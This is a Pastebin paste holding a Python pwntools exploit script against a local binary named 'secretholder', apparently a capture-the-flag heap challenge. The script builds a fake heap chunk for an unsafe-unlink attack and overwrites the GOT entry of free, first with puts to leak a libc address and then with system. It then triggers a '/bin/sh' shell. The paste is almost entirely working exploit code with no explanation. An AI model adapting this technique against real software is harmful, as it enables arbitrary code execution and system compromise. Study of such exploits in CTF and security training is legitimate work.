Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- def keep(idx, data):
- p.recvuntil('3. Renew secret')
- p.sendline('1')
- p.recvuntil('3. Huge secret')
- p.sendline(str(idx))
- p.recvline()
- p.sendline(data)
- def wipe(idx):
- p.recvuntil('3. Renew secret')
- p.sendline('2')
- p.recvuntil('3. Huge secret')
- p.sendline(str(idx))
- def renew(idx, data):
- p.recvuntil('3. Renew secret')
- p.sendline('3')
- p.recvuntil('3. Huge secret')
- p.sendline(str(idx))
- p.recvline()
- p.send(data)
- if __name__ == '__main__':
- p = process("./secretholder")
- context.log_level='debug'
- addr = 0x6020a8
- free_got = 0x602018
- puts_plt = 0x4006c0
- keep(1,'AAAA')
- keep(2,'AAAA')
- keep(3,'AAAA')
- wipe(1)
- wipe(2)
- wipe(3)
- keep(3,'AAAA')
- wipe(1)
- keep(1,'AAAA')
- keep(2,'AAAA')
- fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)
- junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)
- renew(3,fake_chunk + junk)
- sleep(0.2)
- wipe(2)
- renew(3, p64(0)*3 + p64(free_got - 0x10))
- renew(3, p64(0)*2 + p64(puts_plt))
- renew(1,'/bin/sh;' + "A"*8)
- wipe(1)
- p.recvuntil("/bin/sh;" + "A"*8)
- leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
- print "[+] Leak : 0x%x" % leak
- system = leak - 0x3be7b8 + 0x45390 - 0x63c0
- renew(3, p64(0)*2 + p64(system))
- wipe(1)
- p.interactive()
Add Comment
Please, Sign In to add comment